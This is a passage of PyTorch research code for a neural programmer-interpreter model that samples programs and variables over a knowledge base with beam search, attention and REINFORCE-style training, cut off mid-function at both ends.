old_property_value = self.immutable_scatter_nd_constant_update(old_property_value, index_for_scatter, new_value)
old_property_value = old_property_value.view([self.beam_size, self.batch_size, self.num_progs,\
int(math.pow(self.max_num_var,self.max_arguments))])
beam_properties['program_argument_table_index'] = torch.unbind(old_property_value)
true_program_sample = true_program_sample.type(self.dtype_int64)
# _____________________________________________________________________________
###############################################################################
# =============================================================================
# returning the program samples and similar stuff
for beam_id, true_prog_samples, true_var_samples in zip(xrange(self.beam_size),\
list(torch.unbind(true_program_sample)), actual_var_samples_list):
to_return_action_sequence['program_type'][beam_id].append(true_prog_samples)
arg_types, argtype_embedding = self.argument_type_net(true_prog_samples)
to_return_action_sequence['argument_type'][beam_id].append(torch.transpose(arg_types, 1,0))
to_return_action_sequence['argument_table_index'][beam_id].append(true_var_samples)
#with tf.device('/cpu:0'):
target_types = torch.index_select(self.program_to_targettype_table, 0, true_prog_samples)
to_return_action_sequence['target_type'][beam_id].append(target_types)
# =============================================================================
# need to track current target program type so that we can terminate if gold type occurs
condition = torch.max((target_types==torch.zeros_like(target_types, device=self.device)).type(self.dtype_float), (target_types==(self.num_progs-1*torch.ones_like(target_types,device=self.device))).type(self.dtype_float))
beam_properties['target_type'][beam_id] = torch.where(condition>0., beam_properties['target_type'][beam_id].type(self.dtype_int64), target_types)
# _____________________________________________________________________________
prog_sampled_embeddings = self.program_embedding(true_prog_samples)
argtypes = list(torch.unbind(arg_types, dim=0))
var_embed = [self.manual_gather_nd(self.variable_embedding[beam_id], torch.stack([argtypes[i], self.batch_ids], dim=1)) \
for i in xrange(self.max_arguments)]
#var_embed is a max_arguments sized list of batch_size x max_num_var x var_embed_dim
var_sample = list(torch.unbind(true_var_samples, dim = 1))
# var_sample is a max_arguments sized list of tensors of shape batch_size
var_sample_index = [torch.stack([self.batch_ids, var_sample[i]], dim=1) for i in range(self.max_arguments)]
input_var_embedding = [self.manual_gather_nd(var_embed[i], var_sample_index[i]) for i in xrange(self.max_arguments)]
num_variables_till_now, R_Flag = self.get_num_variables_till_now(beam_id, target_types)
[target_var_key, \
beam_properties['target_var_embedding'][beam_id]] = self.target_var_net(input_var_embedding, \
argtype_embedding, \
prog_sampled_embeddings, num_variables_till_now, \
target_types)
self.add_to_variable_table(target_types, target_var_key,\
beam_properties['target_var_embedding'][beam_id], \
num_variables_till_now, beam_id = beam_id)
# =============================================================================
# whenever any variable table overflows we need to give negative reward for that
beam_properties['Model_Reward_Flag'][beam_id] = beam_properties['Model_Reward_Flag'][beam_id]+R_Flag
# _____________________________________________________________________________
to_return_action_sequence['target_table_index'][beam_id].append(num_variables_till_now)
# _____________________________________________________________________________
###############################################################################
# reshaping stuff so that it can be handled by main function
for beam_id in xrange(self.beam_size):
for i in xrange(self.num_timesteps):
to_return_action_sequence['argument_table_index'][beam_id][i] = list(torch.unbind(\
to_return_action_sequence['argument_table_index'][beam_id][i],dim = 0))
# =============================================================================
#setting the Model Reward FLAG
to_return_action_sequence['Model_Reward_Flag'] = beam_properties['Model_Reward_Flag']
# _____________________________________________________________________________
###############################################################################
# to_return_action_sequence['argument_table_index'] is a list of length beam_size containing a list of
# length num_timesteps containing a list of max argument length with tensors of shape batch size
self.ProgramProb = torch.exp(to_return_sequence_logprob)
self.logProgramProb = to_return_sequence_logprob
self.per_step_prob = to_return_per_step_prob
self.entropy = self.entropy/self.num_timesteps
# print 100*'%'
# print beam_properties['target_type']
# print beam_properties['terminate']
# print self.gold_target_type
# print beam_properties['check_penalization']
# print 100*'%'
return to_return_action_sequence, torch.exp(to_return_sequence_logprob), \
to_return_sequence_logprob, self.debug_beam_terminate, to_return_per_step_prob, self.entropy/self.num_timesteps
def get_feasible_progs(self, timestep, phase_elasticity):
num_variables = [torch.transpose(torch.sum(self.variable_mask[i], dim=2, dtype=self.dtype_int64), 1,0) for i in range(len(self.variable_mask))]
#num_variables is a beam_size sized list of dimension batch_size x num_argtypes
num_variables_remaining = [self.required_argtypes - num_variables[i] for i in range(len(self.variable_mask))]
num_variables_remaining = [torch.where(num_variables_remaining[i]>0, num_variables_remaining[i], torch.zeros_like(num_variables_remaining[i], device=self.device)) for i in range(len(self.variable_mask))]
num_variables_remaining = [torch.unsqueeze(num_variables_remaining[i], 1).repeat([1, self.num_progs, 1]) for i in range(len(self.variable_mask))]
program_to_targettype_onehot = self.one_hot(self.program_to_targettype_table, depth=self.num_argtypes)
#program_to_targettype_onehot is of dimension num_progs x num_argtypes
# print num_variables_remaining[0].dtype,program_to_targettype_onehot.dtype
reqd_programs = [torch.max(torch.mul(num_variables_remaining[i], program_to_targettype_onehot), dim=2)[0].type(self.dtype_float) for i in range(len(self.variable_mask))]
#reqd_programs is a beam_size sized list of dimension batch_size x num_progs
#self.program_to_num_arguments is of dimension num_progs x num_argtypes
num_variable_types = [torch.max(self.variable_mask[i], dim=2)[0].type(self.dtype_int64) for i in range(len(self.variable_mask))]
#num_variable_types is a beam_size sized list of dimension num_argtypes x batch_size
num_variable_types = [torch.unsqueeze(num_variable_types[i],dim=0).repeat([self.num_progs,1,1]).permute([2,0,1]) for i in \
range(len(self.variable_mask))]
#num_variable_types is a beam_size sized list of dimension batch_size x num_progs x num_argtypes
feasible_progs = [torch.where(num_variable_types[i]>=self.program_to_num_arguments, \
torch.ones_like(num_variable_types[i], device=self.device), torch.zeros_like(num_variable_types[i], device=self.device)) \
for i in range(len(self.variable_mask))]
#feasible_progs is of dimension batch_size x num_progs x num_argtypes
feasible_progs = [torch.prod(feasible_progs[i], dim=2).type(self.dtype_float) for i in range(len(self.variable_mask))]
#feasible_progs is of dimension batch_size x num_progs
program_to_kb_attention = torch.max(self.kb_attention, dim=2)[0]
feasible_progs = [torch.mul(program_to_kb_attention, feasible_progs[i]) for i in range(len(self.variable_mask))]
def separate_phases(arg):
feasible_prog = arg[0]
phase_elasticity = arg[1]
if timestep < self.max_num_phase_1_steps:
temp = phase_elasticity.repeat([1,self.num_progs])
multiplicand1 = self.progs_phase_1.type(self.dtype_float)
else:
temp = (1-phase_elasticity).repeat([1,self.num_progs])
multiplicand1 = self.progs_phase_2.type(self.dtype_float)
multiplicand2 = 1 - multiplicand1
multiplicand = torch.mul(temp, multiplicand1) + torch.mul(1-temp, multiplicand2)
feasible_prog = torch.mul(feasible_prog, multiplicand)
return feasible_prog
feasible_progs = map(separate_phases, zip(feasible_progs,phase_elasticity))
# =============================================================================
# Hard Rules
temp = self.one_hot(torch.zeros([self.batch_size], device=self.device), depth=self.num_progs, dtype=self.dtype_float)
feasible_progs = [temp + (1-temp)*feasible_progs[i] for i in range(len(self.variable_mask))]
if timestep == 0:
def make_none_impossible(prog_mask):
temp = self.one_hot(torch.zeros([self.batch_size], device=self.device), depth = self.num_progs, dtype=self.dtype_float)
new_mask = -1*temp + (1-temp)
prog_mask = torch.mul(new_mask, prog_mask)
return prog_mask
feasible_progs = map(make_none_impossible,feasible_progs)
# _____________________________________________________________________________
#print 'feasible progs ', [feasible_progs[i] for i in range(len(self.variable_mask))]
#print 'feasible_progs[i]+reqd_programs[i] ', [feasible_progs[i]+reqd_programs[i] for i in range(len(self.variable_mask))]
feasible_progs_new = [torch.where(feasible_progs[i]>0, feasible_progs[i]+reqd_programs[i], feasible_progs[i]) for i in range(len(self.variable_mask))]
feasible_progs = [torch.mul(self.bias_prog_sampling_with_target, feasible_progs_new[i]) + torch.mul((1.0-self.bias_prog_sampling_with_target), feasible_progs[i]) for i in range(len(self.variable_mask))]
return feasible_progs
def add_preprocessed_output_to_variable_table(self, beam_id):
R_Flag = torch.zeros([self.batch_size], device=self.device)
for i in xrange(self.num_argtypes):
if i==self.empty_argtype_id:
continue
for j in xrange(self.max_num_var):
ones = i*torch.ones([1, self.batch_size], dtype=self.dtype_int64, device=self.device)
empties = self.empty_argtype_id*torch.ones([self.max_arguments-1, self.batch_size], dtype=self.dtype_int64, device=self.device)
argtype = torch.cat([ones, empties], dim=0)
#argtype is of dimension max_arguments x batch_size
argtype_embed = self.argtype_embedding(argtype)
input_var_embedding = torch.unsqueeze(torch.matmul(self.preprocessed_var_emb_table[i][j], self.preprocessed_var_emb_mat), dim=0)
#input_var_embedding is of dimension 1 x batch_size x var_embed_dim
zeros_embedding = torch.zeros([self.max_arguments-1, self.batch_size, self.var_embed_dim], device=self.device)
input_var_embedding = torch.cat([input_var_embedding, zeros_embedding], dim=0)
#input_var_embedding is of dimension max_arguments x batch_size x var_embed_dim
target_types = i*torch.ones([self.batch_size], device=self.device, dtype=self.dtype_int64)
num_variables_till_now, cur_r_flag = self.get_num_variables_till_now(beam_id, target_types)
[target_var_key, \
target_var_embedding] = self.target_var_net_for_preprocessed_output(input_var_embedding, argtype_embed, num_variables_till_now, target_types)
#target_types is of dimension batch_size
self.add_to_variable_table(target_types, target_var_key, target_var_embedding, num_variables_till_now, beam_id = beam_id)
R_Flag = R_Flag + cur_r_flag
# once variable props from preprocessing are copied to main variable table
# update main variable mask. Initialize main variable mask with the masks in preprocessed variable mask table
self.variable_mask[beam_id] = torch.stack([torch.stack(temp, dim = 1) for temp in \
self.preprocessed_var_mask_table], dim = 0)
self.variable_atten_table[beam_id] = list(torch.unbind(self.variable_mask[beam_id]+0))
return R_Flag
def sentence_encoder(self):
sentence_outputs = None
rnn_inputs_w2v = self.word_embeddings(self.encoder_text_inputs_w2v)
rnn_inputs_kb_emb = self.encoder_text_inputs_kb_emb
rnn_inputs = torch.cat([rnn_inputs_w2v, rnn_inputs_kb_emb], dim = 2)
init_state = torch.unsqueeze(self.init_state.repeat([self.batch_size, 1]), dim=0)
print rnn_inputs.shape, init_state.shape
sentence_outputs, states = self.sentence_rnn(rnn_inputs, init_state)
attention_states = torch.transpose(sentence_outputs.view([self.batch_size,self.max_len,-1]), 1,0)
#attention_states is of dimension max_len x batch_size x cell_dim
return states, attention_states
def get_feasible_progs_for_last_timestep(self):
gold_type = self.gold_target_type
#gold_type is of dimension batch_size
gold_type = torch.unsqueeze(gold_type, dim=1).repeat([1, self.num_progs])
#gold_type is of dimension batch_size x num_progs
feasible_progs_for_last_timestep = torch.where((gold_type==self.program_to_targettype_table), torch.ones_like(gold_type, device=self.device), torch.zeros_like(gold_type, device=self.device))
#feasible_progs_for_last_timestep is of dimension batch_size x num_progs
return feasible_progs_for_last_timestep
def attention_on_relations(self, attention_states):
attention_states = torch.matmul(torch.matmul(attention_states, self.query_rel_atten), torch.transpose(self.rel_embedding,1,0))
attention_states = torch.sum(attention_states, dim=0)
attention_states = nn.functional.softmax(attention_states)
#attention_states is of dimension batch_size x num_rel
return attention_states
def attention_on_types(self, attention_states):
attention_states = torch.matmul(torch.matmul(attention_states, self.query_type_atten), torch.transpose(self.type_embedding,1,0))
attention_states = torch.sum(attention_states, dim=0)
attention_states = nn.functional.softmax(attention_states)
return attention_states
def reset_state(self, sentence_state):
zero_state = torch.zeros([self.batch_size, self.npi_core_dim],device=self.device)
h_states = zero_state
e_state = self.dropout(self.elu(self.reset_layer(sentence_state)))
target_var_embedding = torch.zeros([self.batch_size, self.var_embed_dim],device=self.device)
h_states = torch.unsqueeze(h_states, dim=0)
return h_states, e_state, target_var_embedding
def npi_core(self, h_state, e_state, target_var_embedding):
s_in = torch.unsqueeze(self.state_encoding(e_state, target_var_embedding), dim=0)
#s_in is of dimension 1 x batch_size x state_dim
target_var_embedding = torch.unsqueeze(target_var_embedding, dim=0)
c = torch.cat([s_in, target_var_embedding], dim=2)
#c is of dimension 1 x batch_size x (state_dim + var_embed_dim)
#c = torch.transpose(c, 1,0)
h_state, c = self.npi_rnn(c, h_state)
#h_state is of dimension batch_size x npi_core_dim
return c, h_state
def env_encoding(self, e_state, target_var_embedding):
c = torch.unsqueeze(target_var_embedding,dim=0)
#c is of dimension 1 x batch_size x var_embed_dim
#c = torch.transpose(c, 1,0)
c, e_state = self.env_rnn(c, e_state)
return c, e_state
def state_encoding(self, e_state, target_var_embedding):
merge = torch.cat([e_state.view([self.batch_size, -1]), target_var_embedding], dim=1)
#merge is of dimension batch_size x (self.npi_core_dim+var_embed_dim)
elu = self.dropout(self.elu(self.state_encoding_layer1(merge)))
#elu is of dimension batch_size x hidden_dim
elu = self.dropout(self.elu(self.state_encoding_layer2(elu)))
#elu is of dimension batch_size x hidden_dim
out = self.dropout(self.elu(self.state_encoding_layer3(elu)))
#out is of dimension batch_size x state_dim
return out
def terminate_net(self, progs_taken, old_terminate):
temp1 = torch.ones_like(progs_taken, device=self.device, dtype=self.dtype_int64)
temp2 = torch.zeros_like(progs_taken, device=self.device, dtype=self.dtype_int64)
# 0 is the None action
terminate = torch.where((progs_taken==self.num_progs-1), temp1, temp2)
terminate = terminate.view([self.batch_size, 1]).type(old_terminate.dtype)
terminate = torch.where(terminate>=old_terminate, terminate, old_terminate)
return terminate
# this will return tensor of shape batch_size x 1
def none_finder_net(self, progs_taken):
temp1 = torch.ones_like(progs_taken, device=self.device)
temp2 = torch.zeros_like(progs_taken, device=self.device)
# 0 is the None action
out = torch.where((progs_taken==0), temp1, temp2)
out = out.view([self.batch_size, 1])
return out
# this will return tensor of shape batch_size x 1
def check_if_gold_target(self, beam_target_type, beam_gold_type, if_terminated, t):
mask_same_type = torch.where((beam_target_type==beam_gold_type), torch.zeros_like(beam_target_type, device=self.device), \
torch.ones_like(beam_target_type, device=self.device)).type(self.dtype_float)
if t < self.num_timesteps-1:
return torch.mul(mask_same_type,if_terminated)
else:
return mask_same_type
def phase_change_net(self, h, timestep, old_p_el):
if timestep < self.max_num_phase_1_steps:
p_el = self.dropout(self.phase_change_layer(h))
p_el = nn.functional.sigmoid(p_el)
p_el = torch.where(p_el>old_p_el, old_p_el, p_el)
temp = torch.ones_like(p_el, device=self.device)
p_el = torch.where(p_el>self.phase_change_threshold, temp, p_el)
return p_el
else:
temp = torch.zeros_like(old_p_el, device=self.device)
return temp
def prog_net(self, h, sentence_state, attention_states, query_attentions_till_now, feasible_progs, num_samples, terminate, last_target_type):
#print 'feasible progs', feasible_progs
#feasible_progs is of shape batch_size x num_progs
# variable_mask beam_size x [num_argtypes, batch_size, max_num_var]
#self.program_to_argtype_table is of dimension num_progs x max_arguments
#last_target_type is of dimension batch_size
last_target_type = last_target_type.view([-1,1,1]).repeat(1,self.num_progs, self.max_arguments)
programs_consuming_last_targettype = torch.max(torch.where((self.program_to_argtype_table==last_target_type),\
torch.ones_like(last_target_type, dtype=self.dtype_int64, device=self.device), torch.zeros_like(last_target_type, device=self.device)), dim=2)[0].type(self.dtype_float)
feasible_progs_new = torch.where(feasible_progs>0, feasible_progs+ programs_consuming_last_targettype, feasible_progs)
feasible_progs = torch.mul(self.bias_prog_sampling_with_last_variable, feasible_progs_new) + torch.mul((1.0-self.bias_prog_sampling_with_target), feasible_progs)
#programs_consuming_last_targettype is of dimension batch_size x num_progs
#feasible_progs is of dimension batch_size x num_progs
if self.concat_query_npistate:
concat_hq = torch.cat([h, sentence_state], dim=1)
else:
concat_hq = h
concat_hq = concat_hq.view([self.batch_size, -1])
if self.query_attention:
query_attention = torch.mul(attention_states, torch.mul(h, self.query_attention_h_mat))
#temp is of dimension max_len x batch_size x cell_dim
query_attention = nn.functional.softmax(torch.sum(query_attention, dim=2), dim=0)
#query_attention is of dimension max_len x batch_size
if self.dont_look_back_attention:
query_attentions_till_now = torch.transpose(query_attentions_till_now, 1,0)
query_attention = nn.functional.softmax(torch.mul(1.-query_attentions_till_now, query_attention), dim=0)
query_attentions_till_now = nn.functional.softmax(query_attentions_till_now+query_attention, dim=0)
query_attentions_till_now = torch.transpose(query_attentions_till_now, 1,0)
query_attention = torch.unsqueeze(query_attention, dim=2)
query_attention = torch.sum(torch.mul(query_attention, attention_states), dim=0)
concat_hq = torch.cat([concat_hq, query_attention], dim=1)
hidden = self.dropout(self.prog_key_layer1(concat_hq))
key = self.dropout(self.prog_key_layer2(hidden))
key = key.view([-1, 1, self.prog_key_dim])
prog_sim = torch.mul(key, self.program_keys)
prog_dist = torch.sum(prog_sim, 2)
prog_dist = nn.functional.softmax(prog_dist, dim=1)
if self.params['terminate_prog'] is True:
temp = self.one_hot((self.num_progs-1)*torch.ones([self.batch_size], device=self.device), depth=self.num_progs, dtype=self.dtype_float)
feasible_progs = terminate*temp + (1-terminate)*feasible_progs
prog_dist = torch.mul(prog_dist, feasible_progs)
#prog_dist is of dimension batch_size x num_progs
prog_sampled_probs, prog_sampled_indices = self.bernoulli_program_sampling(prog_dist, num_samples)
prog_sampled_probs = torch.div(prog_sampled_probs,torch.sum(torch.clamp(prog_dist,0,1), dim=1, keepdim=True))
# prog_sampled_probs is a tensor of shape batch_size x num_samples
# prog_sampled_indices is a tensor of shape batch_size x num_samples
prog_sampled_embeddings = self.program_embedding(prog_sampled_indices)
# prog_sampled_embeddings is a tensor of shape batch_size x num_samples x prog_embed_dim
list_program_sample_index = list(torch.unbind(prog_sampled_indices,dim=1))
# list_program_sample_index is a num_samples length list composed of batch_size sized tensors
kb_attention_for_sampled_progs = []
for prog_sample_index in list_program_sample_index:
prog_sample_index = torch.stack([self.batch_ids, prog_sample_index], dim=1)
kb_attention_for_sampled_progs.append(self.manual_gather_nd(self.kb_attention, prog_sample_index))
# kb_attention_for_sampled_progs is a num_samples length list composed of batch_size x max_var x max_var x max_var sized tensors
return prog_sampled_probs, prog_sampled_indices, prog_sampled_embeddings, \
torch.stack(kb_attention_for_sampled_progs, dim = 0), query_attentions_till_now
def argument_type_net(self, prog_sample):
#with tf.device('/cpu:0'):
arg_types = torch.index_select(self.program_to_argtype_table, 0, prog_sample)
# argtypes is of dimension batch_size x max_arguments
# argtypes is a list of argument types for that sampled program
# in order to handle different length argtypes in a batch,
# consider that for every program there is max upto N arguments only (with padding whenever necessary)
argtype_embedding = self.argtype_embedding(arg_types)
#argtype_embeddign is of dimension batch_size x max_arguments x argtype_embed_dim
arg_types = torch.transpose(arg_types, 1,0)
argtype_embedding = torch.transpose(argtype_embedding, 1,0)
#argtype_embeddign is of dimension max_arguments x batch_size x argtype_embed_dim
return arg_types, argtype_embedding
def input_var_net(self, h, arg_types, prog_sample, prog_embedding, kb_attention, beam_id, num_samples, terminate, past_program_variables):
#prog_sample is of batch_size
target_types = torch.index_select(self.program_to_targettype_table, 0, prog_sample)
# targettypes is of dimension batch_size
argtypes = list(torch.unbind(arg_types, dim=0))
# argtypes is a max_arguments sized list of dimension batch_size each
local_var_atten = torch.stack(self.variable_atten_table[beam_id], dim=0)
#with tf.device('/cpu:0'):
var_atten = [self.manual_gather_nd(local_var_atten,torch.stack([argtypes[i], self.batch_ids], dim=1)) \
for i in xrange(self.max_arguments)]
# var_atten is a max_arguments sized list of batch_size x max_num_var
#with tf.device('/cpu:0'):
var_mask = [self.manual_gather_nd(self.variable_mask[beam_id],torch.stack([argtypes[i], self.batch_ids], dim=1)) \
for i in xrange(self.max_arguments)]
# var_mask is a max_arguments sized list of batch_size x max_num_var
var_atten = [self.update_attention(var_atten[i], h, i) for i in range(self.max_arguments)]
var_atten = [self.mask_attention(var_atten[i], var_mask[i]) for i in xrange(self.max_arguments)]
# var_atten is a max_arguments sized list of batch_size x max_num_var
#with tf.device('/cpu:0'):
var_keys = [self.manual_gather_nd(self.variable_keys[beam_id], torch.stack([argtypes[i], self.batch_ids], dim=1)) \
for i in xrange(self.max_arguments)]
# var_keys is a max_arguments sized list of batch_size x max_num_var x var_key_dim
# var_atten is a max_arguments sized list of batch_size x max_num_var
key = [self.dropout(self.elu(self.inp_var_key_layer(var_atten[i]))) for i in xrange(self.max_arguments)]
key = [key[i].view([-1, 1, self.var_key_dim]) for i in xrange(self.max_arguments)]
var_sim = [torch.mul(key[i], var_keys[i]) for i in xrange(self.max_arguments)]
# var_sim is of dimension batch_size x max_num_var x var_key_dim
var_dist = [torch.sum(var_sim[i], 2) for i in xrange(self.max_arguments)]
var_dist = [nn.functional.softmax(var_dist[i], dim=1) for i in xrange(self.max_arguments)]
var_dist = [torch.mul(var_dist[i],var_mask[i]) for i in xrange(self.max_arguments)]
# var_dist is a max_arguments sized list of dimension batch_size x max_num_var
# we have to get the joint distribution over the different arguments.
var_dist = torch.stack(var_dist,dim=1)
#var_mask is of dimension batch_size x max_arguments x max_num_var
split_var_dist = list(torch.unbind(var_dist, dim=0))
# split_var_dist is a batch_size sized list of dimension max_arguments x max_num_var
joint_var_dist = []
for _var_dist_ in split_var_dist:
list_vectors_dist = list(torch.unbind(_var_dist_,dim=0))
joint_var_dist.append(self.recursive_joint_prob_generator(list_vectors_dist))
joint_var_dist = torch.stack(joint_var_dist,dim=0)
flattened_joint_var_dist = joint_var_dist.view([self.batch_size,-1])
flattened_joint_var_dist = torch.mul(flattened_joint_var_dist, kb_attention)
flattened_joint_var_dist = torch.mul(flattened_joint_var_dist, past_program_variables)
# =============================================================================
# ensuring all 0 variable probability vector is handled appropriately
marker = torch.mean(flattened_joint_var_dist,dim = 1, keepdim=True)
marker = torch.where((marker==0), 0*torch.ones_like(marker, device=self.device), torch.ones_like(marker, device=self.device))
flattened_joint_var_dist = self.mask_attention(flattened_joint_var_dist, torch.ones_like(flattened_joint_var_dist, device=self.device))
flattened_joint_var_dist = torch.mul(flattened_joint_var_dist, marker)
# ______________________________________________________________________________
var_sampled_probs, var_sampled_indices = torch.topk(flattened_joint_var_dist, k = num_samples)
# var_sampled_probs is a tensor of shape batch_size x num_samples
# var_sampled_indices is a tensor of shape batch_size x num_samples
return var_sampled_probs, var_sampled_indices, target_types
def get_num_variables_till_now(self, beam_id, targettypes):
t = torch.stack([targettypes.type(self.dtype_int64), self.batch_ids], dim=1)
var_mask = self.manual_gather_nd(self.variable_mask[beam_id], t)
# var_mask is of dimension batch_size x max_num_var
num_variables_till_now = torch.sum(var_mask, dim=1).type(self.dtype_int64)
# num_variables_till_now = num_variables_till_now.type(self.dtype_int64)
# num_variables_till_now is of dimension batch_size
# =================================================================================================================
# for None arg_type we should always ensure there is only one element in table to have consistent probabilities
# 0 is none type
num_variables_till_now = torch.where(targettypes==0, torch.zeros_like(num_variables_till_now, device=self.device), num_variables_till_now)
# =================================================================================================================
# =============================================================================
# Return a negative reward if table overpopulates
temp = (self.max_num_var-1) * torch.ones_like(num_variables_till_now, device=self.device)
R_Flag = torch.zeros_like(num_variables_till_now, device=self.device, dtype=self.dtype_float)
R_Flag = torch.where(num_variables_till_now > temp, 1+R_Flag, R_Flag)
# Overpopulation - Rewrite last entry in table
num_variables_till_now = torch.where(num_variables_till_now > temp, temp, num_variables_till_now)
return num_variables_till_now, R_Flag
def target_var_net(self, input_var_embedding, argtype_embedding, prog_embedding, num_variables_till_now, target_type):
var_embedding = torch.stack(input_var_embedding, dim=0)
#var_embedding is of dimension max_arguments x batch_size x var_embed_dim
argument_type_embedding = argtype_embedding
#argument_type_embedding is of dimension max_arguments x batch_size x argtype_embed_dim
target_var_key, target_var_embedding = self.get_target_var_key_and_embedding(var_embedding, \
prog_embedding, \
argument_type_embedding, \
num_variables_till_now, target_type)
#prog_embedding is of dimension batch_size x prog_embed_dim
#target_var_embedding is of dimension batch_size x var_embed_dim
#target_var_key is of dimension batch_size x var_key_dim
return target_var_key, target_var_embedding
def target_var_net_for_preprocessed_output(self, input_var_embedding, argtype_embedding, num_variables_till_now, target_type):
[target_var_key, \
target_var_embedding] = self.get_target_var_key_and_embedding(input_var_embedding, None, argtype_embedding, num_variables_till_now, target_type)
return target_var_key, target_var_embedding
def add_to_variable_table(self, targettypes, target_var_key, target_var_embedding, num_variables_till_now, beam_id = None):
# =============================================================================
indices_to_update = torch.stack([targettypes, self.batch_ids, num_variables_till_now], dim=1)
# indices_to_update is of dimension batch_size x 3
# variable_mask is of dimension num_argtypes x batch_size x max_num_var
mask_value_to_update = torch.ones([self.batch_size], device=self.device)
self.variable_mask[beam_id] = self.immutable_scatter_nd_constant_update(self.variable_mask[beam_id], \
indices_to_update, mask_value_to_update)
# variable_mask is of dimension num_argtypes x batch_size x max_num_var
self.variable_keys[beam_id] = self.immutable_scatter_nd_1d_update(self.variable_keys[beam_id], \
indices_to_update, target_var_key)
# self.variable_keys is of dimension num_argtypes x batch_size x max_num_var x var_key_dim
self.variable_embedding[beam_id] = self.immutable_scatter_nd_1d_update(self.variable_embedding[beam_id], \
indices_to_update, target_var_embedding)
# self.variable_embedding is of dimension num_argtypes x batch_size x max_num_var x var_embed_dim
#### VARIABLE_ATTENTION TABLE ALSO NEEDED TO BE UPDATED (SO THAT THE NEWLY ADDED ROW DOES NOT GET 0 ATTENTION)
local_var_atten = torch.stack(self.variable_atten_table[beam_id], dim=0)
# local_var_atten has shape = [self.num_argtypes, self.batch_size, self.max_num_var]
local_var_atten = self.immutable_scatter_nd_constant_update(local_var_atten, indices_to_update, mask_value_to_update)
self.variable_atten_table[beam_id] = list(torch.unbind(torch.nn.functional.normalize(local_var_atten,p=1, dim = 2), dim = 0))
def get_target_var_key_and_embedding(self, var_embedding, prog_embedding, argtype_embedding, num_variables_till_now, target_type):
#var_embedding is of dimension max_arguments x batch_size x var_embed_dim
#prog_embedding is of dimension batch_size x prog_embed_dim
#argtype_embedding is of dimension max_arguments x batch_size x argtype_embed_dim
#target_var_embedding is batch_size x var_embed_dim
#var_embedding and prog_embedding may be None
if prog_embedding is None:
prog_embedding = torch.zeros([self.batch_size, self.prog_embed_dim], device=self.device)
list_argtype_embedding = list(torch.unbind(argtype_embedding, dim = 0))
input_1 = list_argtype_embedding[0]
input_2 = list_argtype_embedding[1]
for current_argtype_id in range(len(list_argtype_embedding)):
input_1 = self.dropout(self.elu(self.target_var_key_and_embedding_arg_layer[current_argtype_id](torch.cat([input_1,input_2],dim=1))))
# temp = torch.cat([input_1,input_2],dim=1)
# input_1 = self.target_var_key_and_embedding_arg_layer[current_argtype_id](temp)
if current_argtype_id + 2 > len(list_argtype_embedding)-1:
break
input_2 = list_argtype_embedding[current_argtype_id+2]
l2_input_1 = input_1
list_var_embedding = list(torch.unbind(var_embedding, dim = 0))
input_1 = list_var_embedding[0]
input_2 = list_var_embedding[1]
for current_var_id in range(len(list_var_embedding)):
input_1 = self.dropout(self.elu(self.target_var_key_and_embedding_var_layer[current_var_id](torch.cat([input_1, input_2],dim=1))))
if current_var_id + 2 > len(list_var_embedding)-1:
break
input_2 = list_var_embedding[current_var_id+2]
l2_input_2 = input_1
l2_input_3 = prog_embedding
l2_input = torch.cat([l2_input_1,l2_input_2,l2_input_3],dim=1)
target_var_embedding = self.dropout(self.elu(self.target_var_key_and_embedding_targetembed_layer(l2_input)))
if self.use_key_as_onehot:
target_type_onehot = self.one_hot(target_type, depth=self.num_argtypes)
num_variables_till_now_onehot = self.one_hot(num_variables_till_now, depth=self.max_num_var)
#target_type_onehot is batch_size x num_argtypes
#num_variables_till_now_onehot is batch_size x max_num_var
target_var_key = torch.cat([target_type_onehot, num_variables_till_now_onehot], dim=1)
else:
target_var_key = self.dropout(self.elu(self.target_var_key_and_embedding_targetkey_layer(l2_input)))
return target_var_key, target_var_embedding
def update_attention(self, static_atten, h, i):
#static_atten is of dimension batch_size x num_var
#h is of dimension batch_size x cell_dim
inputs = torch.cat([static_atten,h.view([self.batch_size,-1])], dim = 1)
new_static_atten = nn.functional.softmax(self.elu(self.update_attention_layer[i](inputs)), dim=-1)
return new_static_atten
def mask_attention(self, static_atten, mask):
#static_atten is of dimension batch_size x num_var
#mask is of dimension batch_size x num_var
masked_atten = torch.mul(static_atten, mask)
num = len(masked_atten.shape)
l1norm = torch.sum(masked_atten, dim=1)
stacked_norm = torch.mul(torch.ones_like(masked_atten, device=self.device),torch.unsqueeze(l1norm,num-1))
masked_atten = torch.where(stacked_norm==0, torch.ones_like(masked_atten, device=self.device), masked_atten)
new_l1_norm = torch.sum(masked_atten, dim=1)
masked_atten = masked_atten/new_l1_norm.view([-1,1])
return masked_atten
def train(self, feed_dict2):
with torch.no_grad():
self.Reward = torch.tensor(feed_dict2['reward'], dtype=self.dtype_float, device=self.device)
#self.ProgramProb = feed_dict['ProgramProb']
#self.logProgramProb = feed_dict['logProgramProb']
#self.per_step_prob = feed_dict['per_step_prob']
#self.entropy = feed_dict['entropy']
self.IfPosIntermediateReward = torch.tensor(feed_dict2['IfPosIntermediateReward'], dtype=self.dtype_float, device=self.device)
self.mask_IntermediateReward = torch.tensor(feed_dict2['mask_IntermediateReward'], dtype=self.dtype_float, device=self.device)
self.IntermediateReward = torch.tensor(feed_dict2['IntermediateReward'], dtype=self.dtype_float, device=self.device)
self.Relaxed_reward = torch.tensor(feed_dict2['Relaxed_reward'], dtype=self.dtype_float, device=self.device)
overall_step_count = feed_dict2['overall_step_count']
def reinforce():
#mask_cnf = torch.where(self.Reward>0,torch.ones_like(self.Reward),torch.zeros_like(self.Reward))
current_baseline = torch.sum(torch.mul(self.Reward,self.ProgramProb),dim=1,keepdim=True).detach()
#self.Relaxed_reward = tf.placeholder(tf.float32, [self.batch_size, self.beam_size])
current_baseline_relaxed = torch.div(torch.sum(torch.mul(self.Relaxed_reward, self.ProgramProb), dim=1, keepdim=True), torch.sum(self.ProgramProb,dim=1,keepdim=True)).detach()
# from intermediate rewards
#self.IfPosIntermediateReward = tf.placeholder(tf.float32, [self.batch_size, self.beam_size])
self.rate_intermediate_reward = self.params['lr_intermideate_reward']
#self.mask_IntermediateReward = tf.placeholder(tf.float32, [self.batch_size, self.beam_size, self.num_timesteps])
#self.IntermediateReward = tf.placeholder(tf.float32, [self.batch_size, self.beam_size])
int_reward = torch.mul(self.IntermediateReward,self.IfPosIntermediateReward)
prob_intermediate = torch.mul(self.mask_IntermediateReward, self.per_step_prob)
prob_intermediate = torch.where(self.mask_IntermediateReward==0,torch.ones_like(self.mask_IntermediateReward, device=self.device),prob_intermediate)
prob_intermediate = torch.prod(prob_intermediate, dim = 2)
if self.forced_normalize_ir:
